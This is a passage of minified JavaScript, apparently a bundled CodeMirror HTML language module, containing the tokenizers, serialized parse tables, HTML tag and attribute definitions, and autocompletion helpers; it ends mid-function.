Xe=54,ke=1,Ye=55,Me=2,Be=56,Ee=3,D=4,Ge=5,y=6,ee=7,te=8,ae=9,le=10,De=11,Re=12,Ze=13,w=57,Ne=14,R=58,We=20,He=22,re=23,Ie=24,k=26,ne=27,Ue=28,je=31,Je=34,se=36,Le=37,ze=0,Fe=1,Ke={area:!0,base:!0,br:!0,col:!0,command:!0,embed:!0,frame:!0,hr:!0,img:!0,input:!0,keygen:!0,link:!0,meta:!0,param:!0,source:!0,track:!0,wbr:!0,menuitem:!0},et={dd:!0,li:!0,optgroup:!0,option:!0,p:!0,rp:!0,rt:!0,tbody:!0,td:!0,tfoot:!0,th:!0,tr:!0},Z={dd:{dd:!0,dt:!0},dt:{dd:!0,dt:!0},li:{li:!0},option:{option:!0,optgroup:!0},optgroup:{optgroup:!0},p:{address:!0,article:!0,aside:!0,blockquote:!0,dir:!0,div:!0,dl:!0,fieldset:!0,footer:!0,form:!0,h1:!0,h2:!0,h3:!0,h4:!0,h5:!0,h6:!0,header:!0,hgroup:!0,hr:!0,menu:!0,nav:!0,ol:!0,p:!0,pre:!0,section:!0,table:!0,ul:!0},rp:{rp:!0,rt:!0},rt:{rp:!0,rt:!0},tbody:{tbody:!0,tfoot:!0},td:{td:!0,th:!0},tfoot:{tbody:!0},th:{td:!0,th:!0},thead:{tbody:!0,tfoot:!0},tr:{tr:!0}};function tt(e){return e==45||e==46||e==58||e>=65&&e<=90||e==95||e>=97&&e<=122||e>=161}function oe(e){return e==9||e==10||e==13||e==32}let N=null,W=null,H=0;function Y(e,t){let l=e.pos+t;if(H==l&&W==e)return N;let a=e.peek(t);for(;oe(a);)a=e.peek(++t);let r="";for(;tt(a);)r+=String.fromCharCode(a),a=e.peek(++t);return W=e,H=l,N=r?r.toLowerCase():a==at||a==lt?void 0:null}const Oe=60,v=62,M=47,at=63,lt=33,rt=45;function I(e,t){this.name=e,this.parent=t,this.hash=t?t.hash:0;for(let l=0;l-1?new I(Y(a,1)||"",e):e},reduce(e,t){return t==We&&e?e.parent:e},reuse(e,t,l,a){let r=t.type.id;return r==y||r==se?new I(Y(a,1)||"",e):e},hash(e){return e?e.hash:0},strict:!1}),ot=new q((e,t)=>{if(e.next!=Oe){e.next<0&&t.context&&e.acceptToken(w);return}e.advance();let l=e.next==M;l&&e.advance();let a=Y(e,0);if(a===void 
0)return;if(!a)return e.acceptToken(l?Ne:y);let r=t.context?t.context.name:null;if(l){if(a==r)return e.acceptToken(De);if(r&&et[r])return e.acceptToken(w,-2);if(t.dialectEnabled(ze))return e.acceptToken(Re);for(let n=t.context;n;n=n.parent)if(n.name==a)return;e.acceptToken(Ze)}else{if(a=="script")return e.acceptToken(ee);if(a=="style")return e.acceptToken(te);if(a=="textarea")return e.acceptToken(ae);if(Ke.hasOwnProperty(a))return e.acceptToken(le);r&&Z[r]&&Z[r][a]?e.acceptToken(w,-1):e.acceptToken(y)}},{contextual:!0}),Ot=new q(e=>{for(let t=0,l=0;;l++){if(e.next<0){l&&e.acceptToken(R);break}if(e.next==rt)t++;else if(e.next==v&&t>=2){l>3&&e.acceptToken(R,-2);break}else t=0;e.advance()}});function it(e){for(;e;e=e.parent)if(e.name=="svg"||e.name=="math")return!0;return!1}const ut=new q((e,t)=>{if(e.next==M&&e.peek(1)==v){let l=t.dialectEnabled(Fe)||it(t.context);e.acceptToken(l?Ge:D,2)}else e.next==v&&e.acceptToken(D,1)});function B(e,t,l){let a=2+e.length;return new q(r=>{for(let n=0,o=0,O=0;;O++){if(r.next<0){O&&r.acceptToken(t);break}if(n==0&&r.next==Oe||n==1&&r.next==M||n>=2&&no?r.acceptToken(t,-o):r.acceptToken(l,-(o-2));break}else if((r.next==10||r.next==13)&&O){r.acceptToken(t,1);break}else n=o=0;r.advance()}})}const pt=B("script",Xe,ke),ct=B("style",Ye,Me),dt=B("textarea",Be,Ee),ft=Te({"Text RawText":S.content,"StartTag StartCloseTag SelfClosingEndTag EndTag":S.angleBracket,TagName:S.tagName,"MismatchedCloseTag/TagName":[S.tagName,S.invalid],AttributeName:S.attributeName,"AttributeValue UnquotedAttributeValue":S.attributeValue,Is:S.definitionOperator,"EntityReference CharacterReference":S.character,Comment:S.blockComment,ProcessingInst:S.processingInstruction,DoctypeDecl:S.documentMeta}),ht=Pe.deserialize({version:14,states:",xOVO!rOOO!WQ#tO'#CqO!]Q#tO'#CzO!bQ#tO'#C}O!gQ#tO'#DQO!lQ#tO'#DSO!qOaO'#CpO!|ObO'#CpO#XOdO'#CpO$eO!rO'#CpOOO`'#Cp'#CpO$lO$fO'#DTO$tQ#tO'#DVO$yQ#tO'#DWOOO`'#Dk'#DkOOO`'#DY'#DYQVO!rOOO%OQ&rO,59]O%WQ&rO,59fO%`Q&rO,59iO%hQ&rO,59lO%sQ&rO,59nOOOa'#D^'#D^O%{OaO'#CxO&WOaO,59[OOOb'#D_'#D_O&`ObO'#C{O&kObO,59[OOOd'#D`'#D`O&sOdO'#DOO'OOdO,59[OOO`'#Da'#DaO'WO!rO,59[O'_Q#tO'#DROOO`,59[,59[OOOp'#Db'#DbO'dO$fO,59oOOO`,59o,59oO'lQ#|O,59qO'qQ#|O,59rOOO`-E7W-E7WO'vQ&rO'#CsOOQW'#DZ'#DZO(UQ&rO1G.wOOOa1G.w1G.wO(^Q&rO1G/QOOOb1G/Q1G/QO(fQ&rO1G/TOOOd1G/T1G/TO(nQ&rO1G/WOOO`1G/W1G/WOOO`1G/Y1G/YO(yQ&rO1G/YOOOa-E7[-E7[O)RQ#tO'#CyOOO`1G.v1G.vOOOb-E7]-E7]O)WQ#tO'#C|OOOd-E7^-E7^O)]Q#tO'#DPOOO`-E7_-E7_O)bQ#|O,59mOOOp-E7`-E7`OOO`1G/Z1G/ZOOO`1G/]1G/]OOO`1G/^1G/^O)gQ,UO,59_OOQW-E7X-E7XOOOa7+$c7+$cOOOb7+$l7+$lOOOd7+$o7+$oOOO`7+$r7+$rOOO`7+$t7+$tO)rQ#|O,59eO)wQ#|O,59hO)|Q#|O,59kOOO`1G/X1G/XO*RO7[O'#CvO*dOMhO'#CvOOQW1G.y1G.yOOO`1G/P1G/POOO`1G/S1G/SOOO`1G/V1G/VOOOO'#D['#D[O*uO7[O,59bOOQW,59b,59bOOOO'#D]'#D]O+WOMhO,59bOOOO-E7Y-E7YOOQW1G.|1G.|OOOO-E7Z-E7Z",stateData:"+s~O!^OS~OUSOVPOWQOXROYTO[]O][O^^O`^Oa^Ob^Oc^Ox^O{_O!dZO~OfaO~OfbO~OfcO~OfdO~OfeO~O!WfOPlP!ZlP~O!XiOQoP!ZoP~O!YlORrP!ZrP~OUSOVPOWQOXROYTOZqO[]O][O^^O`^Oa^Ob^Oc^Ox^O!dZO~O!ZrO~P#dO![sO!euO~OfvO~OfwO~OS|OhyO~OS!OOhyO~OS!QOhyO~OS!SOT!TOhyO~OS!TOhyO~O!WfOPlX!ZlX~OP!WO!Z!XO~O!XiOQoX!ZoX~OQ!ZO!Z!XO~O!YlORrX!ZrX~OR!]O!Z!XO~O!Z!XO~P#dOf!_O~O![sO!e!aO~OS!bO~OS!cO~Oi!dOSgXhgXTgX~OS!fOhyO~OS!gOhyO~OS!hOhyO~OS!iOT!jOhyO~OS!jOhyO~Of!kO~Of!lO~Of!mO~OS!nO~Ok!qO!`!oO!b!pO~OS!rO~OS!sO~OS!tO~Oa!uOb!uOc!uO!`!wO!a!uO~Oa!xOb!xOc!xO!b!wO!c!xO~Oa!uOb!uOc!uO!`!{O!a!uO~Oa!xOb!xOc!xO!b!{O!c!xO~OT~bac!dx{!d~",goto:"%p!`PPPPPPPPPPPPPPPPPPPP!a!gP!mPP!yP!|#P#S#Y#]#`#f#i#l#r#x!aP!a!aP$O$U$l$r$x%O%U%[%bPPPPPPPP%hX^OX`pXUOX`pezabcde{}!P!R!UR!q!dRhUR!XhXVOX`pRkVR!XkXWOX`pRn
WR!XnXXOX`pQrXR!XpXYOX`pQ`ORx`Q{aQ}bQ!PcQ!RdQ!UeZ!e{}!P!R!UQ!v!oR!z!vQ!y!pR!|!yQgUR!VgQjVR!YjQmWR![mQpXR!^pQtZR!`tS_O`ToXp",nodeNames:"⚠ StartCloseTag StartCloseTag StartCloseTag EndTag SelfClosingEndTag StartTag StartTag StartTag StartTag StartTag StartCloseTag StartCloseTag StartCloseTag IncompleteCloseTag Document Text EntityReference CharacterReference InvalidEntity Element OpenTag TagName Attribute AttributeName Is AttributeValue UnquotedAttributeValue ScriptText CloseTag OpenTag StyleText CloseTag OpenTag TextareaText CloseTag OpenTag CloseTag SelfClosingTag Comment ProcessingInst MismatchedCloseTag CloseTag DoctypeDecl",maxTerm:67,context:st,nodeProps:[["closedBy",-10,1,2,3,7,8,9,10,11,12,13,"EndTag",6,"EndTag SelfClosingEndTag",-4,21,30,33,36,"CloseTag"],["openedBy",4,"StartTag StartCloseTag",5,"StartTag",-4,29,32,35,37,"OpenTag"],["group",-9,14,17,18,19,20,39,40,41,42,"Entity",16,"Entity TextContent",-3,28,31,34,"TextContent Entity"]],propSources:[ft],skippedNodes:[0],repeatNodeCount:9,tokenData:"#%g!aR!YOX$qXY,QYZ,QZ[$q[]&X]^,Q^p$qpq,Qqr-_rs4ysv-_vw5iwxJ^x}-_}!OKP!O!P-_!P!Q$q!Q![-_![!]!!O!]!^-_!^!_!&W!_!`#$o!`!a&X!a!c-_!c!}!!O!}#R-_#R#S!!O#S#T3V#T#o!!O#o#s-_#s$f$q$f%W-_%W%o!!O%o%p-_%p&a!!O&a&b-_&b1p!!O1p4U-_4U4d!!O4d4e-_4e$IS!!O$IS$I`-_$I`$Ib!!O$Ib$Kh-_$Kh%#t!!O%#t&/x-_&/x&Et!!O&Et&FV-_&FV;'S!!O;'S;:j!&Q;:j;=`4s<%l?&r-_?&r?Ah!!O?Ah?BY$q?BY?Mn!!O?MnO$q!Z$|c`PkW!a`!cpOX$qXZ&XZ[$q[^&X^p$qpq&Xqr$qrs&}sv$qvw+Pwx(tx!^$q!^!_*V!_!a&X!a#S$q#S#T&X#T;'S$q;'S;=`+z<%lO$q!R&bX`P!a`!cpOr&Xrs&}sv&Xwx(tx!^&X!^!_*V!_;'S&X;'S;=`*y<%lO&Xq'UV`P!cpOv&}wx'kx!^&}!^!_(V!_;'S&};'S;=`(n<%lO&}P'pT`POv'kw!^'k!_;'S'k;'S;=`(P<%lO'kP(SP;=`<%l'kp([S!cpOv(Vx;'S(V;'S;=`(h<%lO(Vp(kP;=`<%l(Vq(qP;=`<%l&}a({W`P!a`Or(trs'ksv(tw!^(t!^!_)e!_;'S(t;'S;=`*P<%lO(t`)jT!a`Or)esv)ew;'S)e;'S;=`)y<%lO)e`)|P;=`<%l)ea*SP;=`<%l(t!Q*^V!a`!cpOr*Vrs(Vsv*Vwx)ex;'S*V;'S;=`*s<%lO*V!Q*vP;=`<%l*V!R*|P;=`<%l&XW+UYkWOX+PZ[+P^p+Pqr+Psw+Px!^+P!a#S+P#T;'S+P;'S;=`+t<%lO+PW+wP;=`<%l+P!Z+}P;=`<%l$q!a,]``P!a`!cp!^^OX&XXY,QYZ,QZ]&X]^,Q^p&Xpq,Qqr&Xrs&}sv&Xwx(tx!^&X!^!_*V!_;'S&X;'S;=`*y<%lO&X!_-ljhS`PkW!a`!cpOX$qXZ&XZ[$q[^&X^p$qpq&Xqr-_rs&}sv-_vw/^wx(tx!P-_!P!Q$q!Q!^-_!^!_1n!_!a&X!a#S-_#S#T3V#T#s-_#s$f$q$f;'S-_;'S;=`4s<%l?Ah-_?Ah?BY$q?BY?Mn-_?MnO$q[/echSkWOX+PZ[+P^p+Pqr/^sw/^x!P/^!P!Q+P!Q!^/^!^!_0p!a#S/^#S#T0p#T#s/^#s$f+P$f;'S/^;'S;=`1h<%l?Ah/^?Ah?BY+P?BY?Mn/^?MnO+PS0uXhSqr0psw0px!P0p!Q!_0p!a#s0p$f;'S0p;'S;=`1b<%l?Ah0p?BY?Mn0pS1eP;=`<%l0p[1kP;=`<%l/^!U1wbhS!a`!cpOq*Vqr1nrs(Vsv1nvw0pwx)ex!P1n!P!Q*V!Q!_1n!_!a*V!a#s1n#s$f*V$f;'S1n;'S;=`3P<%l?Ah1n?Ah?BY*V?BY?Mn1n?MnO*V!U3SP;=`<%l1n!V3bchS`P!a`!cpOq&Xqr3Vrs&}sv3Vvw0pwx(tx!P3V!P!Q&X!Q!^3V!^!_1n!_!a&X!a#s3V#s$f&X$f;'S3V;'S;=`4m<%l?Ah3V?Ah?BY&X?BY?Mn3V?MnO&X!V4pP;=`<%l3V!_4vP;=`<%l-_!Z5SV!`h`P!cpOv&}wx'kx!^&}!^!_(V!_;'S&};'S;=`(n<%lO&}!_5rjhSkWc!ROX7dXZ8qZ[7d[^8q^p7dqr:crs8qst@Ttw:cwx8qx!P:c!P!Q7d!Q!]:c!]!^/^!^!_=p!_!a8q!a#S:c#S#T=p#T#s:c#s$f7d$f;'S:c;'S;=`?}<%l?Ah:c?Ah?BY7d?BY?Mn:c?MnO7d!Z7ibkWOX7dXZ8qZ[7d[^8q^p7dqr7drs8qst+Ptw7dwx8qx!]7d!]!^9f!^!a8q!a#S7d#S#T8q#T;'S7d;'S;=`:]<%lO7d!R8tVOp8qqs8qt!]8q!]!^9Z!^;'S8q;'S;=`9`<%lO8q!R9`Oa!R!R9cP;=`<%l8q!Z9mYkWa!ROX+PZ[+P^p+Pqr+Psw+Px!^+P!a#S+P#T;'S+P;'S;=`+t<%lO+P!Z:`P;=`<%l7d!_:jjhSkWOX7dXZ8qZ[7d[^8q^p7dqr:crs8qst/^tw:cwx8qx!P:c!P!Q7d!Q!]:c!]!^<[!^!_=p!_!a8q!a#S:c#S#T=p#T#s:c#s$f7d$f;'S:c;'S;=`?}<%l?Ah:c?Ah?BY7d?BY?Mn:c?MnO7d!_b#d#s1n#s$f*V$f;'S1n;'S;=`3P<%l?Ah1n?Ah?BY*V?BY?Mn1n?MnO*V!V!>kdhS!a`!cpOq*Vqr1nrs(Vsv1nvw0pwx)ex!P1n!P!Q*V!Q!_1n!_!a*V!a#V1n#V#W!?y#W#s1n#s$f*V$f;'S1n;'S;=`3P<%l?Ah1n?Ah?BY*V?BY?Mn1n?MnO*V!V!@SdhS!a`!cpOq*Vqr1nrs(Vsv1nvw0pwx)ex!P1n!P!Q*V!Q!_
1n!_!a*V!a#h1n#h#i!Ab#i#s1n#s$f*V$f;'S1n;'S;=`3P<%l?Ah1n?Ah?BY*V?BY?Mn1n?MnO*V!V!AkdhS!a`!cpOq*Vqr1nrs(Vsv1nvw0pwx)ex!P1n!P!Q*V!Q!_1n!_!a*V!a#m1n#m#n!By#n#s1n#s$f*V$f;'S1n;'S;=`3P<%l?Ah1n?Ah?BY*V?BY?Mn1n?MnO*V!V!CSdhS!a`!cpOq*Vqr1nrs(Vsv1nvw0pwx)ex!P1n!P!Q*V!Q!_1n!_!a*V!a#d1n#d#e!Db#e#s1n#s$f*V$f;'S1n;'S;=`3P<%l?Ah1n?Ah?BY*V?BY?Mn1n?MnO*V!V!DkdhS!a`!cpOq*Vqr1nrs(Vsv1nvw0pwx)ex!P1n!P!Q*V!Q!_1n!_!a*V!a#X1n#X#Y!5]#Y#s1n#s$f*V$f;'S1n;'S;=`3P<%l?Ah1n?Ah?BY*V?BY?Mn1n?MnO*V!V!FSchS!a`!cpOq!G_qr!Eyrs!HUsv!Eyvw!Ncwx!Jvx!P!Ey!P!Q!G_!Q!_!Ey!_!a!G_!a!b##T!b#s!Ey#s$f!G_$f;'S!Ey;'S;=`#$i<%l?Ah!Ey?Ah?BY!G_?BY?Mn!Ey?MnO!G_!R!GfY!a`!cpOr!G_rs!HUsv!G_vw!Hpwx!Jvx!a!G_!a!b!Lv!b;'S!G_;'S;=`!N]<%lO!G_q!HZV!cpOv!HUvx!Hpx!a!HU!a!b!Iq!b;'S!HU;'S;=`!Jp<%lO!HUP!HsTO!a!Hp!a!b!IS!b;'S!Hp;'S;=`!Ik<%lO!HpP!IVTO!`!Hp!`!a!If!a;'S!Hp;'S;=`!Ik<%lO!HpP!IkOxPP!InP;=`<%l!Hpq!IvV!cpOv!HUvx!Hpx!`!HU!`!a!J]!a;'S!HU;'S;=`!Jp<%lO!HUq!JdS!cpxPOv(Vx;'S(V;'S;=`(h<%lO(Vq!JsP;=`<%l!HUa!J{X!a`Or!Jvrs!Hpsv!Jvvw!Hpw!a!Jv!a!b!Kh!b;'S!Jv;'S;=`!Lp<%lO!Jva!KmX!a`Or!Jvrs!Hpsv!Jvvw!Hpw!`!Jv!`!a!LY!a;'S!Jv;'S;=`!Lp<%lO!Jva!LaT!a`xPOr)esv)ew;'S)e;'S;=`)y<%lO)ea!LsP;=`<%l!Jv!R!L}Y!a`!cpOr!G_rs!HUsv!G_vw!Hpwx!Jvx!`!G_!`!a!Mm!a;'S!G_;'S;=`!N]<%lO!G_!R!MvV!a`!cpxPOr*Vrs(Vsv*Vwx)ex;'S*V;'S;=`*s<%lO*V!R!N`P;=`<%l!G_T!NhbhSOq!Hpqr!Ncrs!Hpsw!Ncwx!Hpx!P!Nc!P!Q!Hp!Q!_!Nc!_!a!Hp!a!b# p!b#s!Nc#s$f!Hp$f;'S!Nc;'S;=`#!}<%l?Ah!Nc?Ah?BY!Hp?BY?Mn!Nc?MnO!HpT# ubhSOq!Hpqr!Ncrs!Hpsw!Ncwx!Hpx!P!Nc!P!Q!Hp!Q!_!Nc!_!`!Hp!`!a!If!a#s!Nc#s$f!Hp$f;'S!Nc;'S;=`#!}<%l?Ah!Nc?Ah?BY!Hp?BY?Mn!Nc?MnO!HpT##QP;=`<%l!Nc!V##^chS!a`!cpOq!G_qr!Eyrs!HUsv!Eyvw!Ncwx!Jvx!P!Ey!P!Q!G_!Q!_!Ey!_!`!G_!`!a!Mm!a#s!Ey#s$f!G_$f;'S!Ey;'S;=`#$i<%l?Ah!Ey?Ah?BY!G_?BY?Mn!Ey?MnO!G_!V#$lP;=`<%l!Ey!V#$zXiS`P!a`!cpOr&Xrs&}sv&Xwx(tx!^&X!^!_*V!_;'S&X;'S;=`*y<%lO&X",tokenizers:[pt,ct,dt,ut,ot,Ot,0,1,2,3,4,5],topRules:{Document:[0,15]},dialects:{noMatch:0,selfClosing:485},tokenPrec:487});function ie(e,t){let l=Object.create(null);for(let a of e.getChildren(re)){let r=a.getChild(Ie),n=a.getChild(k)||a.getChild(ne);r&&(l[t.read(r.from,r.to)]=n?n.type.id==k?t.read(n.from+1,n.to-1):t.read(n.from,n.to):"")}return l}function U(e,t){let l=e.getChild(He);return l?t.read(l.from,l.to):" "}function C(e,t,l){let a;for(let r of l)if(!r.attrs||r.attrs(a||(a=ie(e.node.parent.firstChild,t))))return{parser:r.parser};return null}function ue(e=[],t=[]){let l=[],a=[],r=[],n=[];for(let O of e)(O.tag=="script"?l:O.tag=="style"?a:O.tag=="textarea"?r:n).push(O);let o=t.length?Object.create(null):null;for(let O of t)(o[O.name]||(o[O.name]=[])).push(O);return be((O,p)=>{let h=O.type.id;if(h==Ue)return C(O,p,l);if(h==je)return C(O,p,a);if(h==Je)return C(O,p,r);if(h==se&&n.length){let i=O.node,u=U(i,p),c;for(let d of n)if(d.tag==u&&(!d.attrs||d.attrs(c||(c=ie(i,p))))){let f=i.parent.lastChild;return{parser:d.parser,overlay:[{from:O.to,to:f.type.id==Le?f.from:i.parent.to}]}}}if(o&&h==re){let i=O.node,u;if(u=i.firstChild){let c=o[p.read(u.from,u.to)];if(c)for(let d of c){if(d.tagName&&d.tagName!=U(i.parent,p))continue;let f=i.lastChild;if(f.type.id==k){let P=f.from+1,T=f.lastChild,x=f.to-(T&&T.isError?0:1);if(x>P)return{parser:d.parser,overlay:[{from:P,to:x}]}}else if(f.type.id==ne)return{parser:d.parser,overlay:[{from:f.from,to:f.to}]}}}}return null})}const 
b=["_blank","_self","_top","_parent"],Q=["ascii","utf-8","utf-16","latin1","latin1"],A=["get","post","put","delete"],X=["application/x-www-form-urlencoded","multipart/form-data","text/plain"],m=["true","false"],s={},mt={a:{attrs:{href:null,ping:null,type:null,media:null,target:b,hreflang:null}},abbr:s,address:s,area:{attrs:{alt:null,coords:null,href:null,target:null,ping:null,media:null,hreflang:null,type:null,shape:["default","rect","circle","poly"]}},article:s,aside:s,audio:{attrs:{src:null,mediagroup:null,crossorigin:["anonymous","use-credentials"],preload:["none","metadata","auto"],autoplay:["autoplay"],loop:["loop"],controls:["controls"]}},b:s,base:{attrs:{href:null,target:b}},bdi:s,bdo:s,blockquote:{attrs:{cite:null}},body:s,br:s,button:{attrs:{form:null,formaction:null,name:null,value:null,autofocus:["autofocus"],disabled:["autofocus"],formenctype:X,formmethod:A,formnovalidate:["novalidate"],formtarget:b,type:["submit","reset","button"]}},canvas:{attrs:{width:null,height:null}},caption:s,center:s,cite:s,code:s,col:{attrs:{span:null}},colgroup:{attrs:{span:null}},command:{attrs:{type:["command","checkbox","radio"],label:null,icon:null,radiogroup:null,command:null,title:null,disabled:["disabled"],checked:["checked"]}},data:{attrs:{value:null}},datagrid:{attrs:{disabled:["disabled"],multiple:["multiple"]}},datalist:{attrs:{data:null}},dd:s,del:{attrs:{cite:null,datetime:null}},details:{attrs:{open:["open"]}},dfn:s,div:s,dl:s,dt:s,em:s,embed:{attrs:{src:null,type:null,width:null,height:null}},eventsource:{attrs:{src:null}},fieldset:{attrs:{disabled:["disabled"],form:null,name:null}},figcaption:s,figure:s,footer:s,form:{attrs:{action:null,name:null,"accept-charset":Q,autocomplete:["on","off"],enctype:X,method:A,novalidate:["novalidate"],target:b}},h1:s,h2:s,h3:s,h4:s,h5:s,h6:s,head:{children:["title","base","link","style","meta","script","noscript","command"]},header:s,hgroup:s,hr:s,html:{attrs:{manifest:null}},i:s,iframe:{attrs:{src:null,srcdoc:null,name:null,width:null,height:null,sandbox:["allow-top-navigation","allow-same-origin","allow-forms","allow-scripts"],seamless:["seamless"]}},img:{attrs:{alt:null,src:null,ismap:null,usemap:null,width:null,height:null,crossorigin:["anonymous","use-credentials"]}},input:{attrs:{alt:null,dirname:null,form:null,formaction:null,height:null,list:null,max:null,maxlength:null,min:null,name:null,pattern:null,placeholder:null,size:null,src:null,step:null,value:null,width:null,accept:["audio/*","video/*","image/*"],autocomplete:["on","off"],autofocus:["autofocus"],checked:["checked"],disabled:["disabled"],formenctype:X,formmethod:A,formnovalidate:["novalidate"],formtarget:b,multiple:["multiple"],readonly:["readonly"],required:["required"],type:["hidden","text","search","tel","url","email","password","datetime","date","month","week","time","datetime-local","number","range","color","checkbox","radio","file","submit","image","reset","button"]}},ins:{attrs:{cite:null,datetime:null}},kbd:s,keygen:{attrs:{challenge:null,form:null,name:null,autofocus:["autofocus"],disabled:["disabled"],keytype:["RSA"]}},label:{attrs:{for:null,form:null}},legend:s,li:{attrs:{value:null}},link:{attrs:{href:null,type:null,hreflang:null,media:null,sizes:["all","16x16","16x16 32x32","16x16 32x32 
64x64"]}},map:{attrs:{name:null}},mark:s,menu:{attrs:{label:null,type:["list","context","toolbar"]}},meta:{attrs:{content:null,charset:Q,name:["viewport","application-name","author","description","generator","keywords"],"http-equiv":["content-language","content-type","default-style","refresh"]}},meter:{attrs:{value:null,min:null,low:null,high:null,max:null,optimum:null}},nav:s,noscript:s,object:{attrs:{data:null,type:null,name:null,usemap:null,form:null,width:null,height:null,typemustmatch:["typemustmatch"]}},ol:{attrs:{reversed:["reversed"],start:null,type:["1","a","A","i","I"]},children:["li","script","template","ul","ol"]},optgroup:{attrs:{disabled:["disabled"],label:null}},option:{attrs:{disabled:["disabled"],label:null,selected:["selected"],value:null}},output:{attrs:{for:null,form:null,name:null}},p:s,param:{attrs:{name:null,value:null}},pre:s,progress:{attrs:{value:null,max:null}},q:{attrs:{cite:null}},rp:s,rt:s,ruby:s,samp:s,script:{attrs:{type:["text/javascript"],src:null,async:["async"],defer:["defer"],charset:Q}},section:s,select:{attrs:{form:null,name:null,size:null,autofocus:["autofocus"],disabled:["disabled"],multiple:["multiple"]}},slot:{attrs:{name:null}},small:s,source:{attrs:{src:null,type:null,media:null}},span:s,strong:s,style:{attrs:{type:["text/css"],media:null,scoped:null}},sub:s,summary:s,sup:s,table:s,tbody:s,td:{attrs:{colspan:null,rowspan:null,headers:null}},template:s,textarea:{attrs:{dirname:null,form:null,maxlength:null,name:null,placeholder:null,rows:null,cols:null,autofocus:["autofocus"],disabled:["disabled"],readonly:["readonly"],required:["required"],wrap:["soft","hard"]}},tfoot:s,th:{attrs:{colspan:null,rowspan:null,headers:null,scope:["row","col","rowgroup","colgroup"]}},thead:s,time:{attrs:{datetime:null}},title:s,tr:s,track:{attrs:{src:null,label:null,default:null,kind:["subtitles","captions","descriptions","chapters","metadata"],srclang:null}},ul:{children:["li","script","template","ul","ol"]},var:s,video:{attrs:{src:null,poster:null,width:null,height:null,crossorigin:["anonymous","use-credentials"],preload:["auto","metadata","none"],autoplay:["autoplay"],mediagroup:["movie"],muted:["muted"],controls:["controls"]}},wbr:s},pe={accesskey:null,class:null,contenteditable:m,contextmenu:null,dir:["ltr","rtl","auto"],draggable:["true","false","auto"],dropzone:["copy","move","link","string:","file:"],hidden:["hidden"],id:null,inert:["inert"],itemid:null,itemprop:null,itemref:null,itemscope:["itemscope"],itemtype:null,lang:["ar","bn","de","en-GB","en-US","es","fr","hi","id","ja","pa","pt","ru","tr","zh"],spellcheck:m,autocorrect:m,autocapitalize:m,style:null,tabindex:null,title:null,translate:["yes","no"],rel:["stylesheet","alternate","author","bookmark","help","license","next","nofollow","noreferrer","prefetch","prev","search","tag"],role:"alert application article banner button cell checkbox complementary contentinfo dialog document feed figure form grid gridcell heading img list listbox listitem main navigation region row rowgroup search switch tab table tabpanel textbox timer".split(" 
"),"aria-activedescendant":null,"aria-atomic":m,"aria-autocomplete":["inline","list","both","none"],"aria-busy":m,"aria-checked":["true","false","mixed","undefined"],"aria-controls":null,"aria-describedby":null,"aria-disabled":m,"aria-dropeffect":null,"aria-expanded":["true","false","undefined"],"aria-flowto":null,"aria-grabbed":["true","false","undefined"],"aria-haspopup":m,"aria-hidden":m,"aria-invalid":["true","false","grammar","spelling"],"aria-label":null,"aria-labelledby":null,"aria-level":null,"aria-live":["off","polite","assertive"],"aria-multiline":m,"aria-multiselectable":m,"aria-owns":null,"aria-posinset":null,"aria-pressed":["true","false","mixed","undefined"],"aria-readonly":m,"aria-relevant":null,"aria-required":m,"aria-selected":["true","false","undefined"],"aria-setsize":null,"aria-sort":["ascending","descending","none","other"],"aria-valuemax":null,"aria-valuemin":null,"aria-valuenow":null,"aria-valuetext":null},ce="beforeunload copy cut dragstart dragover dragleave dragenter dragend drag paste focus blur change click load mousedown mouseenter mouseleave mouseup keydown keyup resize scroll unload".split(" ").map(e=>"on"+e);for(let e of ce)pe[e]=null;class V{constructor(t,l){this.tags=Object.assign(Object.assign({},mt),t),this.globalAttrs=Object.assign(Object.assign({},pe),l),this.allTags=Object.keys(this.tags),this.globalAttrNames=Object.keys(this.globalAttrs)}}V.default=new V;function g(e,t,l=e.length){if(!t)return"";let a=t.firstChild,r=a&&a.getChild("TagName");return r?e.sliceString(r.from,Math.min(r.to,l)):""}function $(e,t=!1){for(let l=e.parent;l;l=l.parent)if(l.name=="Element")if(t)t=!1;else return l;return null}function de(e,t,l){let a=l.tags[g(e,$(t,!0))];return a?.children||l.allTags}function E(e,t){let l=[];for(let a=t;a=$(a);){let r=g(e,a);if(r&&a.lastChild.name=="CloseTag")break;r&&l.indexOf(r)<0&&(t.name=="EndTag"||t.from>=a.firstChild.to)&&l.push(r)}return l}const fe=/^[:\-\.\w\u00b7-\uffff]*$/;function j(e,t,l,a,r){let n=/\s*>/.test(e.sliceDoc(r,r+5))?"":">";return{from:a,to:r,options:de(e.doc,l,t).map(o=>({label:o,type:"type"})).concat(E(e.doc,l).map((o,O)=>({label:"/"+o,apply:"/"+o+n,type:"type",boost:99-O}))),validFor:/^\/?[:\-\.\w\u00b7-\uffff]*$/}}function J(e,t,l,a){let r=/\s*>/.test(e.sliceDoc(a,a+5))?"":">";return{from:l,to:a,options:E(e.doc,t).map((n,o)=>({label:n,apply:n+r,type:"type",boost:99-o})),validFor:fe}}function St(e,t,l,a){let r=[],n=0;for(let o of de(e.doc,l,t))r.push({label:"<"+o,type:"type"});for(let o of E(e.doc,l))r.push({label:"",type:"type",boost:99-n++});return{from:a,to:a,options:r,validFor:/^<\/?[:\-\.\w\u00b7-\uffff]*$/}}function gt(e,t,l,a,r){let n=$(l),o=n?t.tags[g(e.doc,n)]:null,O=o&&o.attrs?Object.keys(o.attrs):[],p=o&&o.globalAttrs===!1?O:O.length?O.concat(t.globalAttrNames):t.globalAttrNames;return{from:a,to:r,options:p.map(h=>({label:h,type:"property"})),validFor:fe}}function Pt(e,t,l,a,r){var n;let o=(n=l.parent)===null||n===void 0?void 0:n.getChild("AttributeName"),O=[],p;if(o){let h=e.sliceDoc(o.from,o.to),i=t.globalAttrs[h];if(!i){let u=$(l),c=u?t.tags[g(e.doc,u)]:null;i=c?.attrs&&c.attrs[h]}if(i){let u=e.sliceDoc(a,r).toLowerCase(),c='"',d='"';/^['"]/.test(u)?(p=u[0]=='"'?/^[^"]*$/:/^[^']*$/,c="",d=e.sliceDoc(r,r+1)==u[0]?"":u[0],u=u.slice(1),a++):p=/^[^\s<>='"]*$/;for(let f of i)O.push({label:f,apply:c+f+d,type:"constant"})}}return{from:a,to:r,options:O,validFor:p}}function he(e,t){let{state:l,pos:a}=t,r=z(l).resolveInner(a),n=r.resolve(a,-1);for(let o=a,O;r==n&&(O=n.childBefore(o));){let 
